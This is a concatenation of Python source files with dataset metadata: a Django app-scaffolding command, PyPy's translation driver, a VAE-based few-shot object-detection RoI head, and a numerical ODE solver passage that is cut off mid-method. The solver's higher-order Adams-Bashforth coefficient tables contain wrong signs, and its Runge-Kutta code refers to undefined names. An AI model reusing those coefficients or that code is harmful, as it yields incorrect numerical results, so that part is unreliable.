def handle(self, *args, **options):
name = options['name']
if self.check_name_conflick(name):
self.stdout.write(self.style.ERROR("Sorry, but you can't use %s as name because this name already taken" % name))
exit()
apps_type = options['apptype']
if apps_type not in APP_TEMPLATES:
self.stdout.write(self.style.ERROR("no template with name %s" % apps_type))
exit()
if options['appdir'] == "/":
app_dir = settings.BASE_DIR
app_path = os.path.join(settings.BASE_DIR, name)
else:
app_dir = options['appdir'].strip("/")
app_path = os.path.join(settings.BASE_DIR, "%s/%s" % (app_dir, name))
if os.path.isdir(app_dir):
os.mkdir(app_path)
else:
self.stdout.write(self.style.ERROR("Appdir %s not found" % app_dir))
exit()
template_path = get_app_template_path(apps_type)
call_command("startapp", name, app_path, template=template_path)
os.unlink(os.path.join(app_path, "desc.txt"))
self.stdout.write(self.style.SUCCESS("Congratulation apps %s successfuly created" % name)) | freezmeinster/django-newapp | newapp/management/commands/newapp.py | newapp.py | py | 2,670 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "newapp.utils.get_app_templates",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.walk",
"line_number": 20,
"usage_type": "call"
},
{
"api... |
43304002854 | import sys, os
import os.path
import shutil
from rpython.translator.translator import TranslationContext
from rpython.translator.tool.taskengine import SimpleTaskEngine
from rpython.translator.goal import query
from rpython.translator.goal.timing import Timer
from rpython.annotator.listdef import s_list_of_strings
from rpython.annotator import policy as annpolicy
from rpython.tool.udir import udir
from rpython.rlib.debug import debug_start, debug_print, debug_stop
from rpython.rlib.entrypoint import secondary_entrypoints,\
annotated_jit_entrypoints
import py
from rpython.tool.ansi_print import AnsiLogger
log = AnsiLogger("translation")
def taskdef(deps, title, new_state=None, expected_states=[],
idemp=False, earlycheck=None):
def decorator(taskfunc):
taskfunc.task_deps = deps
taskfunc.task_title = title
taskfunc.task_newstate = None
taskfunc.task_expected_states = expected_states
taskfunc.task_idempotent = idemp
taskfunc.task_earlycheck = earlycheck
return taskfunc
return decorator
# TODO:
# sanity-checks using states
# set of translation steps to profile
PROFILE = set([])
class Instrument(Exception):
pass
class ProfInstrument(object):
name = "profinstrument"
def __init__(self, datafile, compiler):
self.datafile = datafile
self.compiler = compiler
def first(self):
return self.compiler._build()
def probe(self, exe, args):
env = os.environ.copy()
env['PYPY_INSTRUMENT_COUNTERS'] = str(self.datafile)
self.compiler.platform.execute(exe, args, env=env)
def after(self):
# xxx
os._exit(0)
class TranslationDriver(SimpleTaskEngine):
_backend_extra_options = {}
def __init__(self, setopts=None, default_goal=None,
disable=[],
exe_name=None, extmod_name=None,
config=None, overrides=None):
from rpython.config import translationoption
self.timer = Timer()
SimpleTaskEngine.__init__(self)
self.log = log
if config is None:
config = translationoption.get_combined_translation_config(translating=True)
# XXX patch global variable with translation config
translationoption._GLOBAL_TRANSLATIONCONFIG = config
self.config = config
if overrides is not None:
self.config.override(overrides)
if setopts is not None:
self.config.set(**setopts)
self.exe_name = exe_name
self.extmod_name = extmod_name
self.done = {}
self.disable(disable)
if default_goal:
default_goal, = self.backend_select_goals([default_goal])
if default_goal in self._maybe_skip():
default_goal = None
self.default_goal = default_goal
self.extra_goals = []
self.exposed = []
# expose tasks
def expose_task(task, backend_goal=None):
if backend_goal is None:
backend_goal = task
def proc():
return self.proceed(backend_goal)
self.exposed.append(task)
setattr(self, task, proc)
backend, ts = self.get_backend_and_type_system()
for task in self.tasks:
explicit_task = task
if task == 'annotate':
expose_task(task)
else:
task, postfix = task.split('_')
if task in ('rtype', 'backendopt', 'llinterpret',
'pyjitpl'):
if ts:
if ts == postfix:
expose_task(task, explicit_task)
else:
expose_task(explicit_task)
elif task in ('source', 'compile', 'run'):
if backend:
if backend == postfix:
expose_task(task, explicit_task)
elif ts:
if ts == 'lltype':
expose_task(explicit_task)
else:
expose_task(explicit_task)
def set_extra_goals(self, goals):
self.extra_goals = goals
def set_backend_extra_options(self, extra_options):
self._backend_extra_options = extra_options
def get_info(self): # XXX more?
d = {'backend': self.config.translation.backend}
return d
def get_backend_and_type_system(self):
type_system = self.config.translation.type_system
backend = self.config.translation.backend
return backend, type_system
def backend_select_goals(self, goals):
backend, ts = self.get_backend_and_type_system()
postfixes = [''] + ['_'+p for p in (backend, ts) if p]
l = []
for goal in goals:
for postfix in postfixes:
cand = "%s%s" % (goal, postfix)
if cand in self.tasks:
new_goal = cand
break
else:
raise Exception("cannot infer complete goal from: %r" % goal)
l.append(new_goal)
return l
def disable(self, to_disable):
self._disabled = to_disable
def _maybe_skip(self):
maybe_skip = []
if self._disabled:
for goal in self.backend_select_goals(self._disabled):
maybe_skip.extend(self._depending_on_closure(goal))
return dict.fromkeys(maybe_skip).keys()
def setup(self, entry_point, inputtypes, policy=None, extra={}, empty_translator=None):
standalone = inputtypes is None
self.standalone = standalone
if standalone:
# the 'argv' parameter
inputtypes = [s_list_of_strings]
self.inputtypes = inputtypes
if policy is None:
policy = annpolicy.AnnotatorPolicy()
self.policy = policy
self.extra = extra
if empty_translator:
translator = empty_translator
else:
translator = TranslationContext(config=self.config)
self.entry_point = entry_point
self.translator = translator
self.libdef = None
self.secondary_entrypoints = []
if self.config.translation.secondaryentrypoints:
for key in self.config.translation.secondaryentrypoints.split(","):
try:
points = secondary_entrypoints[key]
except KeyError:
raise KeyError("Entrypoint %r not found (not in %r)" %
(key, secondary_entrypoints.keys()))
self.secondary_entrypoints.extend(points)
self.translator.driver_instrument_result = self.instrument_result
def setup_library(self, libdef, policy=None, extra={}, empty_translator=None):
""" Used by carbon python only. """
self.setup(None, None, policy, extra, empty_translator)
self.libdef = libdef
self.secondary_entrypoints = libdef.functions
def instrument_result(self, args):
backend, ts = self.get_backend_and_type_system()
if backend != 'c' or sys.platform == 'win32':
raise Exception("instrumentation requires the c backend"
" and unix for now")
datafile = udir.join('_instrument_counters')
makeProfInstrument = lambda compiler: ProfInstrument(datafile, compiler)
pid = os.fork()
if pid == 0:
# child compiling and running with instrumentation
self.config.translation.instrument = True
self.config.translation.instrumentctl = (makeProfInstrument,
args)
raise Instrument
else:
pid, status = os.waitpid(pid, 0)
if os.WIFEXITED(status):
status = os.WEXITSTATUS(status)
if status != 0:
raise Exception("instrumentation child failed: %d" % status)
else:
raise Exception("instrumentation child aborted")
import array, struct
n = datafile.size()//struct.calcsize('L')
datafile = datafile.open('rb')
counters = array.array('L')
counters.fromfile(datafile, n)
datafile.close()
return counters
def info(self, msg):
log.info(msg)
def _profile(self, goal, func):
from cProfile import Profile
from rpython.tool.lsprofcalltree import KCacheGrind
d = {'func':func}
prof = Profile()
prof.runctx("res = func()", globals(), d)
KCacheGrind(prof).output(open(goal + ".out", "w"))
return d['res']
def _do(self, goal, func, *args, **kwds):
title = func.task_title
if goal in self.done:
self.log.info("already done: %s" % title)
return
else:
self.log.info("%s..." % title)
debug_start('translation-task')
debug_print('starting', goal)
self.timer.start_event(goal)
try:
instrument = False
try:
if goal in PROFILE:
res = self._profile(goal, func)
else:
res = func()
except Instrument:
instrument = True
if not func.task_idempotent:
self.done[goal] = True
if instrument:
self.proceed('compile')
assert False, 'we should not get here'
finally:
try:
debug_stop('translation-task')
self.timer.end_event(goal)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#import gc; gc.dump_rpy_heap('rpyheap-after-%s.dump' % goal)
return res
@taskdef([], "Annotating&simplifying")
def task_annotate(self):
""" Annotate
"""
# includes annotation and annotatation simplifications
translator = self.translator
policy = self.policy
self.log.info('with policy: %s.%s' % (policy.__class__.__module__, policy.__class__.__name__))
annotator = translator.buildannotator(policy=policy)
if self.secondary_entrypoints is not None:
for func, inputtypes in self.secondary_entrypoints:
if inputtypes == Ellipsis:
continue
annotator.build_types(func, inputtypes, False)
if self.entry_point:
s = annotator.build_types(self.entry_point, self.inputtypes)
translator.entry_point_graph = annotator.bookkeeper.getdesc(self.entry_point).getuniquegraph()
else:
s = None
self.sanity_check_annotation()
if self.entry_point and self.standalone and s.knowntype != int:
raise Exception("stand-alone program entry point must return an "
"int (and not, e.g., None or always raise an "
"exception).")
annotator.complete()
annotator.simplify()
return s
def sanity_check_annotation(self):
translator = self.translator
irreg = query.qoutput(query.check_exceptblocks_qgen(translator))
if irreg:
self.log.info("Some exceptblocks seem insane")
lost = query.qoutput(query.check_methods_qgen(translator))
assert not lost, "lost methods, something gone wrong with the annotation of method defs"
RTYPE = 'rtype_lltype'
@taskdef(['annotate'], "RTyping")
def task_rtype_lltype(self):
""" RTyping - lltype version
"""
rtyper = self.translator.buildrtyper()
rtyper.specialize(dont_simplify_again=True)
@taskdef([RTYPE], "JIT compiler generation")
def task_pyjitpl_lltype(self):
""" Generate bytecodes for JIT and flow the JIT helper functions
lltype version
"""
from rpython.jit.codewriter.policy import JitPolicy
get_policy = self.extra.get('jitpolicy', None)
if get_policy is None:
self.jitpolicy = JitPolicy()
else:
self.jitpolicy = get_policy(self)
#
from rpython.jit.metainterp.warmspot import apply_jit
apply_jit(self.translator, policy=self.jitpolicy,
backend_name=self.config.translation.jit_backend, inline=True)
#
self.log.info("the JIT compiler was generated")
@taskdef([RTYPE], "test of the JIT on the llgraph backend")
def task_jittest_lltype(self):
""" Run with the JIT on top of the llgraph backend
"""
# parent process loop: spawn a child, wait for the child to finish,
# print a message, and restart
from rpython.translator.goal import unixcheckpoint
unixcheckpoint.restartable_point(auto='run')
# load the module rpython/jit/tl/jittest.py, which you can hack at
# and restart without needing to restart the whole translation process
from rpython.jit.tl import jittest
jittest.jittest(self)
BACKENDOPT = 'backendopt_lltype'
@taskdef([RTYPE, '??pyjitpl_lltype', '??jittest_lltype'], "lltype back-end optimisations")
def task_backendopt_lltype(self):
""" Run all backend optimizations - lltype version
"""
from rpython.translator.backendopt.all import backend_optimizations
backend_optimizations(self.translator, replace_we_are_jitted=True)
STACKCHECKINSERTION = 'stackcheckinsertion_lltype'
@taskdef(['?'+BACKENDOPT, RTYPE, 'annotate'], "inserting stack checks")
def task_stackcheckinsertion_lltype(self):
from rpython.translator.transform import insert_ll_stackcheck
count = insert_ll_stackcheck(self.translator)
self.log.info("inserted %d stack checks." % (count,))
def possibly_check_for_boehm(self):
if self.config.translation.gc == "boehm":
from rpython.rtyper.tool.rffi_platform import configure_boehm
from rpython.translator.platform import CompilationError
try:
configure_boehm(self.translator.platform)
except CompilationError as e:
i = 'Boehm GC not installed. Try e.g. "translate.py --gc=minimark"'
raise Exception(str(e) + '\n' + i)
@taskdef([STACKCHECKINSERTION, '?'+BACKENDOPT, RTYPE, '?annotate'],
"Creating database for generating c source",
earlycheck = possibly_check_for_boehm)
def task_database_c(self):
""" Create a database for further backend generation
"""
translator = self.translator
if translator.annotator is not None:
translator.frozen = True
standalone = self.standalone
get_gchooks = self.extra.get('get_gchooks', lambda: None)
gchooks = get_gchooks()
if standalone:
from rpython.translator.c.genc import CStandaloneBuilder
cbuilder = CStandaloneBuilder(self.translator, self.entry_point,
config=self.config, gchooks=gchooks,
secondary_entrypoints=
self.secondary_entrypoints + annotated_jit_entrypoints)
else:
from rpython.translator.c.dlltool import CLibraryBuilder
functions = [(self.entry_point, None)] + self.secondary_entrypoints + annotated_jit_entrypoints
cbuilder = CLibraryBuilder(self.translator, self.entry_point,
functions=functions,
name='libtesting',
config=self.config,
gchooks=gchooks)
if not standalone: # xxx more messy
cbuilder.modulename = self.extmod_name
database = cbuilder.build_database()
self.log.info("database for generating C source was created")
self.cbuilder = cbuilder
self.database = database
@taskdef(['database_c'], "Generating c source")
def task_source_c(self):
""" Create C source files from the generated database
"""
cbuilder = self.cbuilder
database = self.database
if self._backend_extra_options.get('c_debug_defines', False):
defines = cbuilder.DEBUG_DEFINES
else:
defines = {}
if self.exe_name is not None:
exe_name = self.exe_name % self.get_info()
else:
exe_name = None
c_source_filename = cbuilder.generate_source(database, defines,
exe_name=exe_name)
self.log.info("written: %s" % (c_source_filename,))
if self.config.translation.dump_static_data_info:
from rpython.translator.tool.staticsizereport import dump_static_data_info
targetdir = cbuilder.targetdir
fname = dump_static_data_info(self.log, database, targetdir)
dstname = self.compute_exe_name() + '.staticdata.info'
shutil_copy(str(fname), str(dstname))
self.log.info('Static data info written to %s' % dstname)
def compute_exe_name(self, suffix=''):
newexename = self.exe_name % self.get_info()
if '/' not in newexename and '\\' not in newexename:
newexename = './' + newexename
if suffix:
# Replace the last `.sfx` with the suffix
newname = py.path.local(newexename.rsplit('.', 1)[0])
newname = newname.new(basename=newname.basename + suffix)
return newname
return py.path.local(newexename)
def create_exe(self):
""" Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
"""
if self.exe_name is not None:
exename = self.c_entryp
newexename = py.path.local(exename.basename)
shutil_copy(str(exename), str(newexename))
self.log.info("copied: %s to %s" % (exename, newexename,))
if self.cbuilder.shared_library_name is not None:
soname = self.cbuilder.shared_library_name
newsoname = newexename.new(basename=soname.basename)
shutil_copy(str(soname), str(newsoname))
self.log.info("copied: %s to %s" % (soname, newsoname,))
if hasattr(self.cbuilder, 'executable_name_w'):
# Copy pypyw.exe
exename_w = self.cbuilder.executable_name_w
newexename_w = py.path.local(exename_w.basename)
self.log.info("copied: %s to %s" % (exename_w, newexename_w,))
shutil_copy(str(exename_w), str(newexename_w))
# for pypy, the import library is renamed and moved to
# libs/python32.lib, according to the pragma in pyconfig.h
libname = self.config.translation.libname
oldlibname = soname.new(ext='lib')
if not libname:
libname = oldlibname.basename
libname = str(newsoname.dirpath().join(libname))
shutil.copyfile(str(oldlibname), libname)
self.log.info("copied: %s to %s" % (oldlibname, libname,))
# the pdb file goes in the same place as pypy(w).exe
ext_to_copy = ['pdb',]
for ext in ext_to_copy:
name = soname.new(ext=ext)
newname = newexename.new(basename=soname.basename)
shutil.copyfile(str(name), str(newname.new(ext=ext)))
self.log.info("copied: %s" % (newname,))
# HACK: copy libcffi-*.dll which is required for venvs
# At some point, we should stop doing this, and instead
# use the artifact from packaging the build instead
libffi = py.path.local.sysfind('libffi-8.dll')
if sys.platform == 'win32' and not libffi:
raise RuntimeError('could not find libffi')
elif libffi:
target = os.getcwd() + r'\libffi-8.dll'
if not os.path.exists(target):
# in tests, we can mock using windows without libffi
shutil.copyfile(str(libffi), target)
self.c_entryp = newexename
self.log.info("created: %s" % (self.c_entryp,))
@taskdef(['source_c'], "Compiling c source")
def task_compile_c(self):
""" Compile the generated C code using either makefile or
translator/platform
"""
cbuilder = self.cbuilder
kwds = {}
if self.standalone and self.exe_name is not None:
kwds['exe_name'] = self.compute_exe_name().basename
cbuilder.compile(**kwds)
if self.standalone:
self.c_entryp = cbuilder.executable_name
self.create_exe()
else:
self.c_entryp = cbuilder.get_entry_point()
@taskdef([STACKCHECKINSERTION, '?'+BACKENDOPT, RTYPE], "LLInterpreting")
def task_llinterpret_lltype(self):
from rpython.rtyper.llinterp import LLInterpreter
translator = self.translator
interp = LLInterpreter(translator.rtyper)
bk = translator.annotator.bookkeeper
graph = bk.getdesc(self.entry_point).getuniquegraph()
v = interp.eval_graph(graph,
self.extra.get('get_llinterp_args',
lambda: [])())
log.llinterpret("result -> %s" % v)
def proceed(self, goals):
if not goals:
if self.default_goal:
goals = [self.default_goal]
else:
self.log.info("nothing to do")
return
elif isinstance(goals, str):
goals = [goals]
goals.extend(self.extra_goals)
goals = self.backend_select_goals(goals)
result = self._execute(goals, task_skip = self._maybe_skip())
self.log.info('usession directory: %s' % (udir,))
return result
@classmethod
def from_targetspec(cls, targetspec_dic, config=None, args=None,
empty_translator=None,
disable=[],
default_goal=None):
if args is None:
args = []
driver = cls(config=config, default_goal=default_goal,
disable=disable)
target = targetspec_dic['target']
spec = target(driver, args)
try:
entry_point, inputtypes, policy = spec
except TypeError:
# not a tuple at all
entry_point = spec
inputtypes = policy = None
except ValueError:
policy = None
entry_point, inputtypes = spec
driver.setup(entry_point, inputtypes,
policy=policy,
extra=targetspec_dic,
empty_translator=empty_translator)
return driver
def prereq_checkpt_rtype(self):
assert 'rpython.rtyper.rmodel' not in sys.modules, (
"cannot fork because the rtyper has already been imported")
prereq_checkpt_rtype_lltype = prereq_checkpt_rtype
# checkpointing support
def _event(self, kind, goal, func):
if kind == 'planned' and func.task_earlycheck:
func.task_earlycheck(self)
if kind == 'pre':
fork_before = self.config.translation.fork_before
if fork_before:
fork_before, = self.backend_select_goals([fork_before])
if not fork_before in self.done and fork_before == goal:
prereq = getattr(self, 'prereq_checkpt_%s' % goal, None)
if prereq:
prereq()
from rpython.translator.goal import unixcheckpoint
unixcheckpoint.restartable_point(auto='run')
if os.name == 'posix':
def shutil_copy(src, dst):
# this version handles the case where 'dst' is an executable
# currently being executed
shutil.copy(src, dst + '~')
os.rename(dst + '~', dst)
else:
shutil_copy = shutil.copy
| mozillazg/pypy | rpython/translator/driver.py | driver.py | py | 24,503 | python | en | code | 430 | github-code | 36 | [
{
"api_name": "rpython.tool.ansi_print.AnsiLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.environ.copy",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "os... |
72312960103 | from typing import Dict, List, Optional, Tuple
import numpy as np
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
from mmcv.utils import ConfigDict
from mmdet.core import bbox2roi
from mmdet.models.builder import HEADS
from mmfewshot.detection.models.roi_heads.meta_rcnn_roi_head import MetaRCNNRoIHead
class VAE(nn.Module):
def __init__(self,
in_channels: int,
latent_dim: int,
hidden_dim: int) -> None:
super(VAE, self).__init__()
self.latent_dim = latent_dim
self.encoder = nn.Sequential(
nn.Linear(in_channels, hidden_dim),
nn.BatchNorm1d(hidden_dim),
nn.LeakyReLU()
)
self.fc_mu = nn.Linear(hidden_dim, latent_dim)
self.fc_var = nn.Linear(hidden_dim, latent_dim)
self.decoder_input = nn.Linear(latent_dim, hidden_dim)
self.decoder = nn.Sequential(
nn.Linear(hidden_dim, in_channels),
nn.BatchNorm1d(in_channels),
nn.Sigmoid()
)
def encode(self, input: Tensor) -> List[Tensor]:
result = self.encoder(input)
mu = self.fc_mu(result)
log_var = self.fc_var(result)
return [mu, log_var]
def decode(self, z: Tensor) -> Tensor:
z = self.decoder_input(z)
z_out = self.decoder(z)
return z_out
def reparameterize(self, mu: Tensor, logvar: Tensor) -> Tensor:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps * std + mu, std + mu
def forward(self, input: Tensor, **kwargs) -> List[Tensor]:
mu, log_var = self.encode(input)
z, z_inv = self.reparameterize(mu, log_var)
z_out = self.decode(z)
return [z_out, z_inv, input, mu, log_var]
def loss_function(self, input, rec, mu, log_var, kld_weight=0.00025) -> dict:
recons_loss = F.mse_loss(rec, input)
kld_loss = torch.mean(-0.5 * torch.sum(1 +
log_var - mu ** 2 - log_var.exp(), dim=1), dim=0)
loss = recons_loss + kld_weight * kld_loss
return {'loss_vae': loss}
@HEADS.register_module()
class VFARoIHead(MetaRCNNRoIHead):
def __init__(self, vae_dim=2048, *args, **kargs) -> None:
super().__init__(*args, **kargs)
self.vae = VAE(vae_dim, vae_dim, vae_dim)
def _bbox_forward_train(self, query_feats: List[Tensor],
support_feats: List[Tensor],
sampling_results: object,
query_img_metas: List[Dict],
query_gt_bboxes: List[Tensor],
query_gt_labels: List[Tensor],
support_gt_labels: List[Tensor]) -> Dict:
"""Forward function and calculate loss for box head in training.
Args:
query_feats (list[Tensor]): List of query features, each item
with shape (N, C, H, W).
support_feats (list[Tensor]): List of support features, each item
with shape (N, C, H, W).
sampling_results (obj:`SamplingResult`): Sampling results.
query_img_metas (list[dict]): List of query image info dict where
each dict has: 'img_shape', 'scale_factor', 'flip', and may
also contain 'filename', 'ori_shape', 'pad_shape', and
'img_norm_cfg'. For details on the values of these keys see
`mmdet/datasets/pipelines/formatting.py:Collect`.
query_gt_bboxes (list[Tensor]): Ground truth bboxes for each query
image with shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y]
format.
query_gt_labels (list[Tensor]): Class indices corresponding to
each box of query images.
support_gt_labels (list[Tensor]): Class indices corresponding to
each box of support images.
Returns:
dict: Predicted results and losses.
"""
query_rois = bbox2roi([res.bboxes for res in sampling_results])
query_roi_feats = self.extract_query_roi_feat(query_feats, query_rois)
support_feat = self.extract_support_feats(support_feats)[0]
support_feat_rec, support_feat_inv, _, mu, log_var = self.vae(
support_feat)
bbox_targets = self.bbox_head.get_targets(sampling_results,
query_gt_bboxes,
query_gt_labels,
self.train_cfg)
(labels, label_weights, bbox_targets, bbox_weights) = bbox_targets
loss_bbox = {'loss_cls': [], 'loss_bbox': [], 'acc': []}
batch_size = len(query_img_metas)
num_sample_per_imge = query_roi_feats.size(0) // batch_size
bbox_results = None
for img_id in range(batch_size):
start = img_id * num_sample_per_imge
end = (img_id + 1) * num_sample_per_imge
# class agnostic aggregation
# random_index = np.random.choice(
# range(query_gt_labels[img_id].size(0)))
# random_query_label = query_gt_labels[img_id][random_index]
random_index = np.random.choice(
range(len(support_gt_labels)))
random_query_label = support_gt_labels[random_index]
for i in range(support_feat.size(0)):
if support_gt_labels[i] == random_query_label:
bbox_results = self._bbox_forward(
query_roi_feats[start:end],
support_feat_inv[i].sigmoid().unsqueeze(0))
single_loss_bbox = self.bbox_head.loss(
bbox_results['cls_score'], bbox_results['bbox_pred'],
query_rois[start:end], labels[start:end],
label_weights[start:end], bbox_targets[start:end],
bbox_weights[start:end])
for key in single_loss_bbox.keys():
loss_bbox[key].append(single_loss_bbox[key])
if bbox_results is not None:
for key in loss_bbox.keys():
if key == 'acc':
loss_bbox[key] = torch.cat(loss_bbox['acc']).mean()
else:
loss_bbox[key] = torch.stack(
loss_bbox[key]).sum() / batch_size
# meta classification loss
if self.bbox_head.with_meta_cls_loss:
# input support feature classification
meta_cls_score = self.bbox_head.forward_meta_cls(support_feat_rec)
meta_cls_labels = torch.cat(support_gt_labels)
loss_meta_cls = self.bbox_head.loss_meta(
meta_cls_score, meta_cls_labels,
torch.ones_like(meta_cls_labels))
loss_bbox.update(loss_meta_cls)
loss_vae = self.vae.loss_function(
support_feat, support_feat_rec, mu, log_var)
loss_bbox.update(loss_vae)
bbox_results.update(loss_bbox=loss_bbox)
return bbox_results
def _bbox_forward(self, query_roi_feats: Tensor,
support_roi_feats: Tensor) -> Dict:
"""Box head forward function used in both training and testing.
Args:
query_roi_feats (Tensor): Query roi features with shape (N, C).
support_roi_feats (Tensor): Support features with shape (1, C).
Returns:
dict: A dictionary of predicted results.
"""
# feature aggregation
roi_feats = self.aggregation_layer(
query_feat=query_roi_feats.unsqueeze(-1).unsqueeze(-1),
support_feat=support_roi_feats.view(1, -1, 1, 1))[0]
cls_score, bbox_pred = self.bbox_head(
roi_feats.squeeze(-1).squeeze(-1), query_roi_feats)
bbox_results = dict(cls_score=cls_score, bbox_pred=bbox_pred)
return bbox_results
def simple_test_bboxes(
self,
query_feats: List[Tensor],
support_feats_dict: Dict,
query_img_metas: List[Dict],
proposals: List[Tensor],
rcnn_test_cfg: ConfigDict,
rescale: bool = False) -> Tuple[List[Tensor], List[Tensor]]:
"""Test only det bboxes without augmentation.
Args:
query_feats (list[Tensor]): Features of query image,
each item with shape (N, C, H, W).
support_feats_dict (dict[int, Tensor]) Dict of support features
used for inference only, each key is the class id and value is
the support template features with shape (1, C).
query_img_metas (list[dict]): list of image info dict where each
dict has: `img_shape`, `scale_factor`, `flip`, and may also
contain `filename`, `ori_shape`, `pad_shape`, and
`img_norm_cfg`. For details on the values of these keys see
:class:`mmdet.datasets.pipelines.Collect`.
proposals (list[Tensor]): Region proposals.
rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN.
rescale (bool): If True, return boxes in original image space.
Default: False.
Returns:
tuple[list[Tensor], list[Tensor]]: Each tensor in first list
with shape (num_boxes, 4) and with shape (num_boxes, )
in second list. The length of both lists should be equal
to batch_size.
"""
img_shapes = tuple(meta['img_shape'] for meta in query_img_metas)
scale_factors = tuple(meta['scale_factor'] for meta in query_img_metas)
rois = bbox2roi(proposals)
query_roi_feats = self.extract_query_roi_feat(query_feats, rois)
cls_scores_dict, bbox_preds_dict = {}, {}
num_classes = self.bbox_head.num_classes
for class_id in support_feats_dict.keys():
support_feat = support_feats_dict[class_id]
support_feat_rec, support_feat_inv, _, mu, log_var = self.vae(
support_feat)
bbox_results = self._bbox_forward(
query_roi_feats, support_feat_inv.sigmoid())
cls_scores_dict[class_id] = \
bbox_results['cls_score'][:, class_id:class_id + 1]
bbox_preds_dict[class_id] = \
bbox_results['bbox_pred'][:, class_id * 4:(class_id + 1) * 4]
# the official code use the first class background score as final
# background score, while this code use average of all classes'
# background scores instead.
if cls_scores_dict.get(num_classes, None) is None:
cls_scores_dict[num_classes] = \
bbox_results['cls_score'][:, -1:]
else:
cls_scores_dict[num_classes] += \
bbox_results['cls_score'][:, -1:]
cls_scores_dict[num_classes] /= len(support_feats_dict.keys())
cls_scores = [
cls_scores_dict[i] if i in cls_scores_dict.keys() else
torch.zeros_like(cls_scores_dict[list(cls_scores_dict.keys())[0]])
for i in range(num_classes + 1)
]
bbox_preds = [
bbox_preds_dict[i] if i in bbox_preds_dict.keys() else
torch.zeros_like(bbox_preds_dict[list(bbox_preds_dict.keys())[0]])
for i in range(num_classes)
]
cls_score = torch.cat(cls_scores, dim=1)
bbox_pred = torch.cat(bbox_preds, dim=1)
# split batch bbox prediction back to each image
num_proposals_per_img = tuple(len(p) for p in proposals)
rois = rois.split(num_proposals_per_img, 0)
cls_score = cls_score.split(num_proposals_per_img, 0)
bbox_pred = bbox_pred.split(num_proposals_per_img, 0)
# apply bbox post-processing to each image individually
det_bboxes = []
det_labels = []
for i in range(len(proposals)):
det_bbox, det_label = self.bbox_head.get_bboxes(
rois[i],
cls_score[i],
bbox_pred[i],
img_shapes[i],
scale_factors[i],
rescale=rescale,
cfg=rcnn_test_cfg)
det_bboxes.append(det_bbox)
det_labels.append(det_label)
return det_bboxes, det_labels
| csuhan/VFA | vfa/vfa_roi_head.py | vfa_roi_head.py | py | 12,474 | python | en | code | 56 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"lin... |
30039556459 | import math
import numpy as np
from sympy import*
import matplotlib.pyplot as plt
class Solver:
def __init__(self, f, t0, y0, h, nsteps, inital_points):
self.f = f
self.t0 = t0
self.y0 = y0
self.h = h
self.nsteps = nsteps
self.inital_points = inital_points;
self.coef_ab = [
[1],
[1],
[3.0/2.0, 1.0/2.0],
[23.0/12.0, -4.0/3.0, 5.0/12.0],
[55.0/24.0, -59.0/24.0, 37.0/24.0, -3.0/8.0],
[1901.0/720.0, -1387.0/360.0, 109.0/30.0, -637.0/360.0, 251.0/720.0],
[4277.0/1440.0, -2641.0/480.0, 4991.0/720.0, -3649.0/720.0, 959.0/480.0, -95.0/288.0],
[198721.0/60480.0, 18367.0/2520.0, 235183.0/20160.0, 10754.0/945.0, 135713.0/20160.0, 5603.0/2520.0, 19087.0/60480.0],
[16083.0/4480.0, 1152169.0/120960.0, 242653.0/13440.0, 296053.0/13440.0, 2102243.0/120960.0, 115747.0/13440.0, 32863.0/13440.0, 5257.0/17280.0]
]
self.coef_am = [
[1],
[1.0/2.0, 1.0/2.0],
[5.0/12.0, 2.0/3.0, -1.0/12.0],
[3.0/8.0, 19.0/24.0, -5.0/24.0, 1.0/24.0],
[251.0/720.0, 323.0/360.0, -11.0/30.0, 53.0/360.0, 19.0/720.0],
[95.0/288.0, 1427.0/1440.0, -133.0/240.0, 241.0/720.0, -173.0/1440.0, 3.0/160.0],
[19087.0/60480.0, 2713.0/2520.0, -15487.0/20160.0, 586.0/945.0, -6737.0/20160.0, 263.0/2520.0, -863.0/60480.0],
[5257.0/17280.0, 139849.0/120960.0, -4511.0/4480.0, 123133.0/120960.0, -88547.0/120960.0, 1537.0/4480.0, -11351.0/120960.0, 275.0/24192.0]
]
self.coef_inv = [
[1],
[1, 1],
[2.0/3.0, 4.0/3.0, -1.0/3.0],
[6.0/11.0, 18.0/11.0, -9.0/11.0, 2.0/11.0],
[12.0/25.0, 48.0/25.0, -36.0/25.0, 16.0/25.0, -3.0/25.0],
[60.0/137.0, 300.0/137.0, -300.0/137.0, 200.0/137.0, -75.0/137.0, 12.0/137.0],
[60.0/147.0, 360.0/147.0, -450.0/147.0, 400.0/147.0, -225.0/147.0, 72.0/147.0, -10.0/147.0]
]
def get_ab(self, ans, idx, order):
value = ans[idx-1][1]
for i in range(1, order+1):
value += (self.h)*(self.coef_ab[order][i-1])*self.f(ans[idx-i][0], ans[idx-i][1])
return value
def euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
y = y + self.h*self.f(t, y)
t = t + self.h
ans.append([t, y])
return ans
def inverse_euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
k = y + self.h*self.f(t, y)
y = y + self.h*self.f(t + self.h, k)
t = t + self.h
ans.append([t, y])
return ans
def improved_euler(self):
ans = []
ans.append([self.t0, self.y0])
t, y = self.t0, self.y0
for i in range(1, self.nsteps+1):
k = y + self.h*self.f(t, y)
y = y + 0.5*self.h*(self.f(t + self.h, k) + self.f(t, y))
t = t + self.h
ans.append([t, y])
return ans
def runge_kutta(self):
ans = []
t, y = self.t0, self.y0
ans.append([t, y])
for i in range(1, self.nsteps+1):
k1 = f(t, y)
k2 = f(t + 0.5*h, y + 0.5*h*k1)
